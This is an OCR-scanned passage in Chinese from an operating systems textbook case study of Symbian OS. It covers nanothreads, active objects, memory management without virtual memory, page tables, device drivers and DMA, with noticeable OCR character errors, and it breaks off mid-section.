由 于 Symbian 操作 系统 只 针对 智能 手机 平台 ， 因 此 有 许多 独特 的 特点 。 它 具有 一 个 可 插 拔 的 消息 结 
构 ， 可 以 引入 新 的 消息 类 型 ， 并 可 以 通过 消息 服务 器 动态 加 载 的 模块 来 实现 。 消 息 系统 被 设计 为 层次 结 
构 ， 各 层 由 特定 类 型 的 对 象 来 实现 。 例 如 ， 消 息 传递 对 象 不 同 于 消息 类 型 对 象 。 一 种 形式 的 消息 传递 ， 
例如 手机 无 线 传递 (类似 于 CDMA) 可 以 传送 几 种 不 同类 型 的 消息 (标准 文本 消息 类 型 、SMS 类 型 或 者 
如 BIO 消息 等 的 系统 指令 )。 通 过 实现 新 的 对 象 并 将 其 加 载 到 内 核 中 可 以 引入 新 的 传递 方法 。 

Symbian 操作 系统 的 核心 设计 有 专门 针对 多 媒体 的 各 种 API。 多 媒体 设备 以 及 上 下 文 由 特殊 的 服务 
器 和 用 户 自 定义 的 结构 (允许 用 户 实现 描述 新 的 或 现存 的 上 下 文 以 及 怎样 对 上 下 文 进行 处 理 的 模块 ) 来 
处 理 。 与 实现 消息 的 方法 相 类 似 ， 多 媒体 是 由 多 种 形式 相互 作用 的 对 象 来 实现 。 声 音 播放 的 方式 被 设计 
为 一 个 与 各 种 声音 格式 的 实现 方式 相互 作用 的 对 象 。 


12.3 Symbian 操作 系统 中 的 进程 和 线程 

Symbian 操作 系统 是 一 个 多 任务 操作 系统 ， 像 其 他 操作 系统 那样 ， 使 用 了 进程 和 线程 的 概念 。 
然而 ，Symbian 操 作 系统 的 内 核 结构 以 及 它 对 资源 稀缺 性 的 处 理 方式 影响 了 它 看 待 这 些 多 任务 对 象 的 
方式 。 
12.3.1 线程 和 纳 线程 

对 于 多 任务 ，Symbian 操 作 系统 更 倾向 于 线程 ， 并 且 是 建立 在 线程 概念 上 的 ， 而 不 是 把 进程 作为 多 
任务 的 基础 。 线 程 构成 了 多 任务 的 中 心 单元 。 操 作 系统 简单 地 把 一 个 进程 看 成 是 具有 一 个 进程 控制 块 和 
某 个 内 存 空间 的 线程 的 集合 。 

Symbian 操作 系统 对 于 线程 的 支持 是 基于 纳 线 程 的 纳 核 。 纳 核 仅 提供 简单 的 线程 支持 ， 每 个 线程 是 
由 一 个 基于 纳 核 的 纳 线程 来 支持 的 。 纳 核 为 纳 线程 提供 调度 、 同 步 (线程 间 通 信 ) 以 及 计时 服务 。 纳 线 
程 运行 在 特权 模式 下 ， 需 要 一 个 栈 来 存储 它们 的 运行 时 刻 环境 数据 。 纳 线程 不 能 运行 在 用 户 态 。 这 就 意 
味 着 操作 系统 能 够 对 每 个 纳 线程 保持 紧密 的 控制 。 每 个 纳 线程 需要 一 个 数据 的 极 小 集 来 运行 ， 实质 上 就 
是 它 的 栈 以 及 栈 的 大 小 。 操 作 系统 保持 对 其 他 一 切 的 控制 ， 比 如 每 个 线程 使 用 的 代码 ， 以 及 在 运行 时 刻 
的 栈 上 存储 线程 的 上 下 文 。 

同 进程 具有 状态 一 样 ， 纳 线程 也 具有 线程 状态 。Symbian 操 作 系 统 的 纳 核 使 用 的 模型 在 基本 模型 中 

增加 了 一 些 状态 。 除 了 基本 状态 以 外 ， 纳 线程 还 可 以 处 于 如 下 状态 : 

“* 挂 起 。 这 就 是 当 一 个 线程 挂 起 另 一 个 线程 时 的 状态 ， 与 等 待 状态 不 同 ， 在 等 待 状态 下 一 个 线程 是 
被 某 个 上 层 对 象 阻塞 (例如 ， 一 个 Symbian 操作 系统 线程 ) 。 

"快速 信号 量 竺 待 。 处 于 这 个 状态 的 线程 正在 等 待 一 个 快速 信号 量 (哨兵 变量 的 一 种 ) 得 到 信号 通 
知 。 快 速 信号 量 是 纳 核 级 别 的 信号 量 。 

，DFC 等 待 。 处 于 这 种 状态 的 线程 正在 等 待 一 个 延迟 的 函数 调用 或 者 要 被 加 入 到 DFC 队 列 中 的 DFC。 
DFC 用 在 设备 驱动 实现 中 。 它 们 代表 对 于 内 核 的 调用 ， 可 被 Symbian 操 作 系统 内 核 层 排 信 队列 并 
且 调 度 执 行 。 

。 休 肯 。 休 眼线 程 正在 等 候 特定 长 度 的 时 间 过 去 。 

“其 他 。 还 有 一 种 通用 状态 ， 是 当 开发 人 员 为 纳 线程 实现 额外 的 状态 时 使 用 的 。 当 开发 人 员 为 新 的 
手机 平台 ( 称 作 个 性 层 ) 扩展 纳 核 功能 时 使 用 该 状态 。 进 行 这 个 工作 的 开发 人 员 也 必须 实现 这 些 
状态 与 他 们 的 扩展 实现 之 间 的 来 回 跳 转 。 

下 面 将 纳 线程 思想 与 传统 进程 思想 作 比 较 。 纳 线程 实际 上 是 一 个 完全 轻 量 级 的 进程 。 它 具有 极 小 的 
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上 下 文 ， 当 纳 线程 进出 处 理 器 时 进行 切换 。 每 个 纳 线程 和 进程 一 样 具有 一 个 状态 。 对 于 纳 线程 来 说 ， 关 
键 是 纳 核对 它们 的 紧密 控制 ， 以 及 构成 每 个 纳 线程 上 下 文 的 极 小 数据 集合 。 

Symbian 操作 系统 线程 依赖 于 纳 线程 ， 内 核 增加 除 纳 核 提 供 的 功能 之 外 的 支持 。 标 准 程序 使 用 的 用 
户 模式 线程 由 Symbian 操作 系统 线程 执行 。 每 个 Symbian 操作 系统 线程 包含 一 个 纳 线程 并 且 添加 自己 的 运 
行 时 刻 栈 到 纳 线程 使 用 的 栈 中 。Symbian 操 作 系统 线程 可 以 通过 系统 调用 在 内 核 模式 下 进行 操作 。 
Symbian 操作 系统 也 能 为 执行 增加 例外 处 理 以 及 退出 信号 。 

Symbian 操作 系统 线程 在 纳 线程 实现 之 上 实现 自己 的 状态 集 。 由 于 Symbian 操作 系统 线程 将 一 些 功 
能 性 增加 到 纳 线程 实现 中 ， 因 此 新 的 状态 反映 了 构成 Symbian 操作 系统 线程 的 新 的 思想 。Symbian 操 作 系 
统 添 加 了 Symbian 操作 系统 线程 可 以 进入 的 新 的 七 种 状态 ， 来 关注 Symbian 操作 系统 线程 可 能 出 现 的 特殊 
阻塞 条 件 。 这 些 特殊 状态 包括 在 信号 量 上 的 等 待 和 挂 起 (正常 的 ) 、 互 斥 变量 以 及 条 件 变 量 。 由 于 
Symbian 操作 系统 的 实现 处 于 纳 线程 之 上 ， 因 此 这 些 状态 从 革 种 方面 上 来 说 是 由 纳 线程 状态 实现 的 ， 通 
常 都 是 用 不 同 的 方式 使 用 挂 起 的 纳 线程 状态 。 


12.3.2 进程 

Symbian 操作 系统 的 进程 ， 就 是 在 一 个 单一 的 进程 控制 块 结构 下 ， 具 有 一 个 单一 存储 空间 的 ， 归 于 
一 类 的 Symbian 操作 系统 的 线程 组 。 可 能 只 有 一 个 执行 的 线程 ， 或 者 一 个 进程 控制 块 下 有 很 多 线程 。 
Symbian 操作 系统 线程 和 纳 线程 已 经 定义 了 进程 状态 和 进程 调度 的 概念 。 因 此 ， 调 度 一 个 进程 实际 上 是 
通过 调度 一 个 线程 以 及 初始 化 数据 需要 使 用 的 正确 的 进程 控制 块 来 完成 的 。 

Symbian 操作 系统 线程 通过 几 种 方式 ， 在 一 个 单一 进程 的 组 织 下 工作 在 一 起 。 首 先 ， 有 一 个 主线 程 
被 标志 为 进程 的 起 始点 。 其 次 ， 线 程 共享 调度 参数 。 也 就 是 说 ， 进程 通过 一 种 调度 方法 一 一 改变 进程 参 
数 ， 来 改变 所 有 线程 的 参数 。 第 三 ， 线 程 共享 包括 设备 和 其 他 对 象 描述 符 的 存储 空间 对 象 。 最 后 ， 当 一 
个 进程 终止 时 ， 内 核 终止 该 进程 的 所 有 线程 。 


12.3.3 活动 对 象 

活动 对 象 是 线程 的 特有 形式 ， 用 这 种 方式 实现 以 便 减 轻 它们 带 给 操作 环境 的 负担 。Symbian 操 作 系 
统 的 设计 者 意识 到 ， 应 用 中 的 线程 在 很 多 情况 下 可 能 会 发 生 阻 塞 。 由 于 Symbian 操作 系统 致力 于 通信 工 
具 方 面 ， 因 此 许多 应 用 程序 具有 类 似 的 执行 模式 : 它们 向 一 个 通信 套 接 字 写 数据 或 者 通过 管道 发 送信 息 ， 
然后 在 等 待 接收 者 的 响应 时 阻塞 。 这 样 设计 活动 对 象 ， 是 为 了 当 它 们 从 这 种 阻塞 状态 返回 时 ， 具有 进入 
被 调用 代码 的 单一 人 口 点 ,这 简化 了 它们 的 实现 。 由 于 活动 对 象 运行 在 用 户 空间 ， 因此 它们 具有 Symbian 
操作 系统 线程 的 特性 。 它 们 本 身 具 有 自己 的 纳 线程 ， 并 且 能 够 加 入 Symbian 操作 系统 的 其 他 线程 构成 操 
作 系统 的 一 个 进程 。 

假若 活动 对 象 仅仅 是 Symbian 操作 系统 线程 ， 有 人 就 会 问 操作 系统 从 这 种 简化 的 线程 模型 中 得 到 了 
什么 益处 。 活 动 对 象 的 关键 点 体现 在 调度 上 。 所 有 的 活动 对 象 在 等 待 事件 的 时 候 驻 留 在 一 个 单一 进程 中 ， 
对 系统 而 言 可 以 作为 一 个 单一 的 线程 。 内 核 不 必 连 续 地 检查 每 一 个 活动 对 象 是 否 被 解除 阻塞 。 因 此 ， 单 
一 进程 中 的 活动 对 象 ， 能 够 由 在 一 个 单一 线程 中 执行 的 单一 调度 器 来 协调 。 通过 将 在 其 他 方面 作为 多 线 
程 执行 的 代码 结合 到 一 个 线程 中 ， 通 过 构建 固定 的 入 口 点 进入 代码 ， 以 及 通过 使 用 -个 单一 调度 器 来 协 
调 它们 的 执行 ， 活 动 对 象 构成 了 标准 线程 的 一 种 高 效 、 轻 量 版 本 。 

认识 到 活动 对 象 和 Symbian 操作 系统 进程 结构 在 何 处 融合 成 为 一体 是 很 重要 的 。 当 一 个 传统 线程 通 
过 系统 调用 进入 等 待 状态 从 而 阻塞 自己 的 运行 时 ， 操 作 系统 仍然 需要 检查 这 个 线程 。 在 上 下 文 切换 期 间 ， 
操作 系统 需要 花费 时 间 检查 处 于 等 待 状态 的 阻塞 进程 ， 决定 是 否 需要 将 其 移动 到 就 绪 状 态 。 活 动 对象 把 
自己 族人 入 等 待 状态 以 等 待 特定 的 事件 ， 因 此 ， 操 作 系统 不 需要 去 检查 它们 ， 而 只 是 在 特定 的 事件 发 生 后 
移动 它们 。 结 果 就 是 更 少 的 线程 检测 以 及 更 好 的 性 能 。 
12.3.4 进程 间 通 信 

在 类 似 Symbian 操作 系统 的 多 线程 环境 中 ， 进程 间 通 信 对 系统 性 能 是 至 关 重要 的 。 线 程 ， 特 别 是 系 
统 服务 形式 的 线程 经 常 通信 。 

委 接 字 是 Symbian 操作 系统 使 用 的 基本 通信 模型 。 它 是 两 个 端点 之 间 抽 象 的 通信 管道 。 这 一 抽象 是 
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用 来 隐藏 端点 之 间 的 传输 方法 和 数据 管理 。Symbian 操 作 系 统 使 用 套 接 字 的 概念 在 客户 端 和 服务 器 端 之 
间 ， 线 程 到 设备 之 间 以 及 线程 之 间 进 行 通信 。 

套 接 字模 型 也 构成 了 设备 MO 的 基础 。 抽 象 再 次 成 为 使 这 一 模型 更 加 有 效 的 关键 。 同 一 个 设备 进行 
数据 交换 的 所 有 机 制 不 是 由 应 用 程序 管理 的 ， 而 是 由 操作 系统 管理 的 。 例 如 ， 网 络 环境 中 工作 于 TCP/IP 
上 的 套 接 字 可 以 很 容易 地 通过 改变 套 用 的 类 型 参数 而 适应 于 蓝牙 环境 。 这 种 变换 下 ， 其 他 大 部 分 
的 数据 交换 工作 都 是 由 操作 系统 完成 的 。 

Symbian 操作 系统 实现 了 通用 操作 系统 上 使 用 的 标准 同步 原 语 。 操 作 系统 中 广泛 地 使 用 了 信号 量 和 
互 斥 量 的 一 些 形式 。 这 些 为 进程 和 线程 提供 同步 能 力 。 


12.4 内 存 管理 

诸如 Linux 和 Windows 系 统 中 的 内 存 管理 使 用 了 很 多 我 们 前 面 讲 过 的 关于 实现 内 存 资源 管理 的 概念 。 
例如 ， 从 物理 内 存 框架 构建 的 虚拟 内 存 页 面 、 按 需 分 页 的 虚拟 内 存 以 及 动态 贡 面 吐 换 ， 这 些 概念 共同 给 
出 近乎 无 限 的 内 存 资源 形象 。 这 里 物理 内 存 是 由 诸如 硬盘 空间 等 支持 和 扩展 的 。 

Symbian 操作 系统 和 实际 的 通用 操作 系统 一 样 ， 也 必须 提供 内 存 管理 模式 。 然 而 ， 由 于 智能 手机 上 
的 存储 容量 非常 有 限 ， 内 存 模型 受到 限制 ， 而 且 进 行内 存 管理 的 时 候 不 能 使 用 虚拟 内 存 /交换 空间 模型 。 
但 正 是 如 此 ，Symbian 操 作 系统 使 用 了 我 们 讨论 过 的 内 存 管理 的 大 多 数 机 制 ， 包 括 硬件 MMU 。 


12.4.1 没有 虚拟 内 存 的 系统 

许多 计算 机 系统 没有 提供 成 熟 的 支持 按 需 分 页 的 虚拟 内 存 的 设备 。 在 这 些 平台 上 操作 系统 可 以 获得 
的 惟一 的 存储 设备 就 是 内 存 ， 它 们 没有 硬盘 设备 。 正 因为 这 样 ， 大 多 数 较 小 的 系统 ， 从 PDA 到 智能 手机 ， 
再 到 更 高 层次 的 掌上 设备 ， 都 不 支持 按 需 分 页 的 虚拟 内 存 。 

下 面 考 虑 大 多 数 小 的 平台 设备 上 使 用 的 内 存 空间 。 这 些 系 统一 般 都 有 两 种 类 型 的 存储 介质 ，RAM 
和 闪存 。RAM 存 储 操作 系统 代码 〈 当 系统 启动 时 使 用 ) ， 闪 存 用 作 操 作 内 存 和 永久 性 (文件 ) 存储 介质 。 
通常 ， 可 以 为 一 个 设备 (比如 安全 数据 卡 ) 增添 额外 的 内存， 这些 存储 空间 专门 用 作 永久 性 存储 。 

没有 支持 按 需 分 页 的 虚拟 内 存 不 代表 缺少 内 存 管理 。 实 际 上 ， 大 多 数 较 小 的 平台 构建 在 包含 许多 较 
大 型 系统 的 管理 特征 的 硬件 上 。 这 些 管理 特征 包含 诸如 分 页 、 地 址 翻译 以 及 虚拟 /物理 地 址 抽象 。 没 有 
虚拟 内 存 仅仅 意味 着 页 面 不 能 从 内 存 交换 出 去 并 存储 在 外 部 设备 上 ， 而 内 存 页 的 抽象 仍然 在 使 用 。 页 面 
被 替换 了 ， 但 是 它们 也 只 是 被 丢弃 了 。 也 就 是 说 只 有 代码 页 可 以 被 置换 ， 因 为 只 有 它们 备份 在 闪存 上 。 

内 存 管理 包含 如 下 的 任务 : 

* 应 用 程序 大 小 的 管理 : 应 用 程序 的 大 小 (所 有 的 代码 和 数据 ) 对 如 何 使 用 内 存 有 很 大 的 影响 。 创 

建 小 的 软件 需要 技巧 和 规则 。 使 用 面向 对 象 的 设计 在 这 里 成 为 一 种 阻碍 (更 多 的 对 象 意味 着 更 多 

的 动态 内 存 分 配 ， 而 这 需要 更 大 的 堆 尺寸 )。 大 多 数 针对 较 小 平台 的 操作 系统 非常 不 鼓励 任何 模块 

的 静态 链接 。 

жет. 堆 (用 来 进行 动态 内 存 分 配 的 空间 ) 在 较 小 的 平台 上 必须 严格 地 管理 。 堆 空间 在 较 小 

的 平台 上 一 般 划 定 边界 ， 以 便 程 序 员 尽 可 能 地 回收 和 重用 。 置 险 越界 会 导致 内 存 分 配 的 错误 。 

“就 地 执行 : 没有 磁盘 设备 的 平台 通常 支持 就 地 执行 。 这 就 是 说 闪存 被 映射 到 虚拟 内 存 地 址 空间 ， 

程序 可 以 直接 从 闪存 上 执行 ， 而 不 需要 首先 复制 到 RAM 上 。 这 样 做 使 加 载 时 间 减 小 为 零 ， 允 许 应 

用 程序 迅速 启动 ， 而 且 也 不 需要 使 用 稀缺 的 RAM 。 

“加 载 动态 链接 库 ， 什 么 时 候 加 载 动 态 链接 库 的 选择 会 明显 影响 系统 性 能 。 例 如 ， 当 应 用 程序 第 一 

次 加 载 到 内 存 就 加 载 所 有 的 动态 链接 库 ， 比 在 执行 中 不 定时 发 生 的 加 载 更 加 容易 接受 。 比 起 执行 

时 应 用 程序 发 生 延 迟 ， 用 户 更 加 能 够 接受 启动 它 时 有 一 些 滞后 。 注 意 动态 链接 库 可 能 并 不 需要 加 

栽 ， 如 果 它 们 已 经 在 内 存 中 或 者 它们 包含 在 外 部 闪存 中 【在 这 种 情况 下 ， 它 们 可 以 就 地 执行 ) 就 

是 这 种 情况 。 

“ 却 下 内 丰 管 理 给 硬件 ， 如 果 有 MMU， 尽 可 能 地 使 用 它 。 实 际 上 ， 将 越 多 的 功能 放 入 MMU， 系 统 

的 性 能 越 好 。 

即使 使 用 就 地 执行 的 规则 ， 较 小 的 平台 仍然 需要 保留 一 部 分 内 存 用 作 操 作 系统 操作 。 这 些 内 存 与 永 


笑 例 研究 3; 5утЫап+## Ж # 529 


和 久 性 存储 介质 共享 ， 并 且 通常 以 两 种 方法 中 的 一 种 进行 管理 。 首 先 ， 一 些 操作 系统 采用 一 种 十 分 简单 的 
方法 ， 内 存根 本 不 分 页 。 在 这 些 类 型 的 系统 中 ， 上 下 文 切换 意味 着 分 配 操作 空间 (比如 堆 空间 ) ， 同 时 
在 所 有 进程 间 共享 这 些 操作 空间 。 这 种 方法 在 进程 的 存储 区 域 几乎 没有 保护 ， 信 任 进程 间 可 以 很 好 地 工 
作 。Palm 操 作 系统 使 用 这 种 简单 的 方式 进行 内 存 管理 。 第 二 种 方法 是 使 用 一 种 更 加 有 规则 的 方法 ， 内 存 
被 切 分 成 为 页 ， 这 些 页 按照 操作 需要 分 配 。 操 作 系统 管理 一 个 空闲 列表 来 保存 页 ， 按 照 需要 分 配给 操作 
系统 和 用 户 进程 。 在 这 种 方法 中 (由 于 没有 虚拟 内 存 )， 当 页 的 空间 列表 用 光 时 ， 系 统 就 会 没有 内 存 ， 
从 而 不 会 再 有 分 配 发 生 。Symbian 操 作 系 统 是 第 二 种 方法 的 例子 。 


12.4.2 Symbian 操作 系统 的 寻 址 方式 

由 于 Symbian 操作 系统 是 32 位 系统 ， 因 此 寻 址 范围 可 以 达到 4GB。 它 与 更 大 的 系统 一 样 使 用 同样 的 
抽象 方式 ， 程序 必须 使 用 由 操作 系统 映射 到 物理 地 址 的 虚拟 地 址 。 和 大 多 数 系统 一 样 ，Symbian 操 作 系 
统 把 内 存 划分 为 虚拟 页 面 和 物理 页 框 。 页 框 的 大 小 通常 是 4KB， 但 也 是 可 变 的 。 

因为 最 大 具有 4GB 的 地 址 空间 ， 因 此 4KB 的 页 框 大 小 就 意味 着 具有 超过 100 万 条 目的 页 表 。Symbian 
操作 系统 只 有 有 限 的 内 存 ， 因 此 不 能 拿 出 1MB 内 存 专用 于 页 表 。 而 且 ， 对 这 么 大 的 一 张 表 的 搜索 和 访问 
对 系统 都 是 很 大 的 负担 。 为 了 解决 这 个 问题 ，Symbian 操 作 系统 采用 2 级 页 表 方 式 ， 如 图 12-2 所 示 。 称 作 
页 面目 录 的 第 一 级 提供 一 个 到 第 二 级 的 链接 ， 可 以 使 用 虚拟 地 址 的 一 部 分 进行 检索 (前 12 位 )。 该 目录 
驻 留 在 内 存 中 ， 由 TTBR ( 转 摘 表 基 址 寄存 器 ) 指向 。 每 个 目录 条 目 指向 第 二 级 ， 也 就 是 页 表 的 集合 。 
这 些 页 表 提 供 到 某 一 内 存 中 特定 页 的 链接 ， 由 虚拟 地 址 的 一 部 分 检索 (中 间 8 位 )。 最 后 ， 虚 拟 地 址 的 低 
12 位 索引 检索 页 的 字 。 在 这 一 虚拟 -物理 地 址 映射 计算 中 ， 硬 件 起 辅助 作用 。 尽 管 Symbian 操作 系统 不 
能 假定 任何 辅助 硬件 的 存在 ， 但 是 在 大 多 数 体系 中 这 一 映射 转换 都 是 由 MMU 完 成 的 。 比 如 ARM 处 理 器 
就 具有 扩展 的 MMU， 带 有 转换 后 备 缓 种 器 来 辅助 地 址 计算 。 
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图 12-2 Symbian 操作 系统 使 用 2 级 页 表 来 减少 页 表 访问 时 间 和 占用 空间 


当 一 个 页 面 不 在 内 存 中 时 ， 就 会 出 现 错误 状态 ， 这 是 因为 当 一 个 应 用 程序 启动 的 时 候 所 有 的 应 用 程 
序 内 存 页 面 都 应 该 已 经 被 加 载 (没有 请 求 页 面 调度 ) 。 链接 到 可 执行 应 用 中 的 小 的 柱 代码 显 式 地 把 动态 
加 载 库 加 载 到 内 存 中 ， 而 不 是 通过 页 失效 方式 。 

Symbian 操作 系统 中 尽管 没有 页 交换 ， 但 内 存 却 不 可 思议 地 是 动态 的 。 应 用 程序 通过 内 存 进行 上 下 
文 切换 ， 同 时 正如 上 面 所 说 的 ， 当 应 用 程序 开始 执行 时 将 它们 所 需要 的 存储 空间 加 载 到 内 存 中 。 每 个 应 
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用 程序 需要 的 内 存 页 面 能 够 从 操作 系统 中 静态 请 求 进入 内 存 。 对 于 堆 (更 确切 地 说 是 动态 空间 ) 是 有 界 
限 的 ， 因 此 静态 请 求 也 可 以 由 动态 空间 来 实现 。 从 一 个 空闲 页 框 的 列表 中 分 配 页 框 给 页 面 ， 如 果 没有 空 
闲 页 框 ， 那 么 就 会 出 现 错误 。 正 在 使 用 的 页 框 不 能 被 刚 到 的 应 用 程序 的 页 面 赫 换 ， 即 使 该 页 框 是 针对 当 
前 没有 执行 的 应 用 程序 的 。 这 是 由 于 Symbian 操 作 系 统 中 没有 页 交换 ， 同 时 因为 十 分 有 限 的 闪存 空间 只 
给 用 户 文件 使 用 ， 也 就 没有 空间 来 复制 被 收回 空间 的 页 面 。 

实际 上 Symbian 操作 系统 使 用 的 存储 实现 模型 有 四 种 不 同 的 版 本 。 每 种 模型 都 是 为 了 特定 类 型 的 硕 
件 配置 。 一 个 简要 的 列表 如 下 : 

“移动 模型 :该 模型 是 为 早期 的 ARM 体 系 结构 设计 的 。 移 动 模型 中 的 页 目录 是 4KB 长 ， 每 个 条 目 4 
字 节 ， 给 出 一 块 16KB 大 小 的 目录 。 通 过 与 页 框 相关 的 存 取 位 和 使 用 域 来 标志 存储 器 访问 的 方式 保 
护 存 储 页 面 。 域 信息 记录 在 页 表 目 录 ，MMU 为 每 个 域 实现 访问 权限 。 尽 管 没有 明确 使 用 分 段 ， 但 
是 在 内 存 布局 上 有 如 下 结构 : 有 用 户 分 配 数据 的 数据 区 ， 也 有 内 核 分 配 数据 的 内 核 区 。 

“复合 模型 :该 模型 是 为 ARM6 或 者 之 后 的 体系 开发 的 模式 。 这 些 版 本 中 的 MMU 与 以 前 版 本 使 用 的 
不 同 。 例 如 ， 由 于 页 表 目 录 能 分 成 两 部 分 ， 每 个 部 分 索引 页 表 的 不 同 部 分 ， 因 此 需要 不 同 的 处 理 
方式 。 这 两 部 分 分 别 用 作用 户 页 表 和 内 核 页 表 。ARM 体 系 中 新 的 版 本 修订 并 增强 了 每 个 页 框 的 访 
问 位 ， 但 是 不 赞成 使 用 域 的 概念 。 

“直接 模型 :该 模型 假定 根本 就 没有 MMU。 这 一 模型 很 少 使 用 ， 并 且 在 智能 手机 上 禁止 使 用 。 没 有 
MMU 会 导致 严重 的 性 能 问题 。 由 于 某 些 原因 ，MMU 被 禁止 的 一 些 场合 中 该 模式 比较 有 用 。 

"仿真 模型 ; 该 模型 是 为 了 支持 基于 windows 宿 主机 的 Symbian 操作 系统 仿真 器 。 仿 真 器 与 实际 的 目 
标 CPU 几 乎 没有 区 别 。 仿 真 器 作为 一 个 单独 的 Windows 进 程 运行 ， 因 此 地 址 空间 被 限定 为 2GB， 
而 不 是 4GB 。 为 仿真 器 提供 的 所 有 内 存 可 以 被 任何 Symbian 操作 系统 进程 访问 ， 因 此 不 具有 内 存 
保护 。Symbian 操 作 系统 库 以 Windows 格 式 的 动态 链接 库 形式 提供 ， 因 此 Windows 处 理 内 存 的 分 配 
和 管理 。 


12.5 输入 和 输出 

Symbian 操 作 系 统 的 输入 /输出 结构 仿照 其 他 操作 系统 的 设计 。 本 节 会 指出 其 中 一 些 Symbian 操 作 系 
统 特有 的 基于 自己 目标 平台 的 性 质 。 

12.5.1 设备 驱动 

在 Symbian 操 作 系 统 中 ， 设 备 驱动 作为 具有 内 核 权限 的 代码 运行 ， 从 而 赋予 用 户 级 别 的 代码 对 系统 
保护 资源 的 访问 能 力 。 同 Linux 与 Windows 一 样 ， 设 备 驱 动 程序 代表 软件 去 访问 硬件 。 

Symbian 操 作 系 统 中 的 设备 驱动 分 为 两 野 ， 一 个 是 逻辑 设备 驱动 (LDD) ， 一 个 是 物理 设备 驱动 
(PDD)。LDD 为 上 层 软件 提供 一 个 接口 ， 而 PDD 直 接 与 硬件 进行 交互 。 在 这 种 模型 下 ，LDD 可 以 为 一 类 
特定 的 设备 使 用 相同 的 实现 ， 而 PDD 随 着 不 同 的 设备 改变 。Symbian 操 作 系 统 支持 许多 标准 的 LDD。 有 
时 ， 如 果 硬 件 非常 标准 或 者 常用 ，Symbian 操 作 系统 也 提供 PDD。 

考虑 串 行 设备 的 一 个 例子 。Symbian 操 作 系 统 定义 了 一 个 通用 的 串 行 LDD， 该 LDD 定 义 了 访问 串 行 
设备 的 程序 接口 。LDD 给 PDD 提 供 一 个 接口 ，PDD 提 供 串 行 设备 访问 接口 。PDD 实 现 有 助 于 调节 CPU 和 
串 行 设备 之 间 速 度 差异 所 必需 的 缓冲 和 流 控制 机 制 。 一 个 单一 的 LDD (用 户 那 边 ) 可 以 连接 任何 用 来 运 
行 串 行 设备 的 PDD。 在 某 个 特定 的 智能 手机 上 ， 这 些 PDD 可 能 包括 一 个 红外 端口 或 者 一 个 RS-232 端 口 。 
这 两 个 是 非常 好 的 例子 ， 它 们 使 用 相同 的 串 行 LDD， 但 是 使 用 不 同 的 PDD。 

当 LDD 和 PDD 不 在 内 存 中 时 ， 它 们 可 以 由 用 户 程序 动态 地 加 载 进 内 存 。 程 序 编 制 工 具 能 够 检查 是 否 
需要 加 载 。 

12.5.2 内 核 扩展 

内 核 扩 展 就 是 Symbian 操作 系统 在 引导 时 刻 加 载 的 驱动 程序 。 由 于 它们 是 在 引导 时 刻 加载 的 ， 因 此 
是 与 标准 的 设备 驱动 区 别 对 待 的 特殊 情况 。 

内 核 扩展 与 标准 的 设备 驱动 不 同 。 大 多 数 设 备 驱 动 是 由 LDD 同 成 对 的 PDD 实 现 的 ， 在 用 户 空间 程序 
需要 的 时 候 加 载 。 内 核 扩 展 在 引导 时 刻 加 载 ， 针 对 特定 的 设备 ， 通 常 没有 成 对 的 PDD。 
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内 核 扩展 是 引导 过 程 的 一 部 分 。 这 些 特 殊 的 设备 驱动 在 调度 器 启动 之 后 加 载 并 且 启动 。 它 们 执行 对 
于 操作 系统 非常 重要 的 功能 ，DMA 服 务 、 显 示 管 理 、 对 外 设 的 总 线 控制 (例如 USB 总 线 )。 之 所 以 提供 
它们 有 两 个 原因 。 首 先 ， 它 与 我 们 已 经 看 作 是 微 内 核 设计 特征 的 面向 对 象 设计 抽象 相称 。 其 次 ， 它 允许 
Symbian 操作 系统 所 处 的 不 同 平台 运行 专门 的 设备 驱动 ， 从 而 不 需要 重新 编译 内 核 而 使 用 硬件 。 


12.5.3 直接 存储 器 访问 

设备 驱动 经 常 使 用 DMA，Symbian 操 作 系统 支持 DMA 硬 件 的 使 用 。DMA 硬 件 包含 一 个 控制 一 系列 
DMA 通 道 的 控制 器 。 每 个 通道 提供 内 存 和 设备 间 的 单一 方向 的 通信 ， 因 此 ， 数 据 的 双向 传输 需要 两 个 
DMA 通 道 。 至 少 有 一 对 DMA 通 道 是 专用 于 显示 LCD 控 制 器 的 。 此 外 ， 大 多 数 平台 提供 一 定数 量 的 常规 
DMA 通 道 。 

一 且 一 个 设备 把 数据 传送 到 内 存 ， 就 会 激发 一 个 系统 中 断 。PDD 为 了 传输 设备 使 用 DMA 硬 件 提供 
的 DMA 服 务 ， 这 里 传输 设备 是 指 与 硬件 接口 的 设备 驱动 的 一 部 分 。 在 PDD 与 DMA 控 制 器 之 间 ， 
Symbian 操作 系统 实现 两 层 软 件 : 一 个 软件 的 DMA 层 ， 一 个 与 DMA 硬 件 接口 的 内 核 扩展 。 DMA 层 把 自 
身分 成 平台 独立 层 和 台 相关 层 。 作 为 内 核 扩展 ， DMA 层 在 引导 进程 中 是 内 核 启动 的 第 一 批 设备 驱动 的 
= 

由 于 特殊 的 原因 ， 对 DMA 的 支持 是 比较 复杂 的 。 Symbian 操作 系统 支持 许多 不 同 的 硬件 配置 ， 但 是 
没有 提供 缺 省 的 DMA 配 置 。 与 DMA 硬 件 的 接口 是 标准 化 的 ， 由 平台 无 关 层 来 提供 。 平台 相关 层 和 内 核 
扩展 由 生产 厂商 提供 ， 这 样 Symbian 操作 系统 就 如 对 其 他 设备 一 样 处 理 DMA 硬 件 ， 在 LDD 和 PDD 构 件 中 
具有 设备 驱动 。 由 于 DMA 硬 件 本 身 是 一 个 设备 ， 并 且 它 并 行 了 Symbian 操作 系统 支持 所 有 设备 的 方式 ， 
因此 这 种 实现 支持 的 方式 是 合理 的 。 

12.5.4 特殊 情况 ,存储 介质 

Symbian 操作 系统 中 存储 介质 驱动 是 PDD 的 一 种 特殊 形式 ， 文件 服务 器 排他 地 使 用 它们 来 实现 对 存 
储 介质 设备 的 访问 。 因为 智能 手机 既 可 以 容纳 固定 的 存储 介质 也 可 以 容纳 移动 的 存储 介质 ， 所 以 存储 介 
质 驱 动 必须 识别 和 支持 多 种 形式 的 存储 介质 。 Symbian 操作 系统 对 介质 的 支持 包括 一 个 标准 的 LDD 和 为 
用 户 提供 的 接口 API。 

Symbian 操作 系统 中 的 文件 服务 器 能 够 同时 支持 多 达 26 个 不 同 的 设备 。 本 地 设备 ， 像 在 Windows 中 
一 样 ， 通 过 驱动 器 号 来 区 分 。 

12.5.5 阻塞 /O 

Symbian 操作 系统 通过 活动 对 象 处 理 阻塞 UO。 设计 者 认识 到 等 待 O 事 件 的 所 有 线程 的 负荷 会 影响 
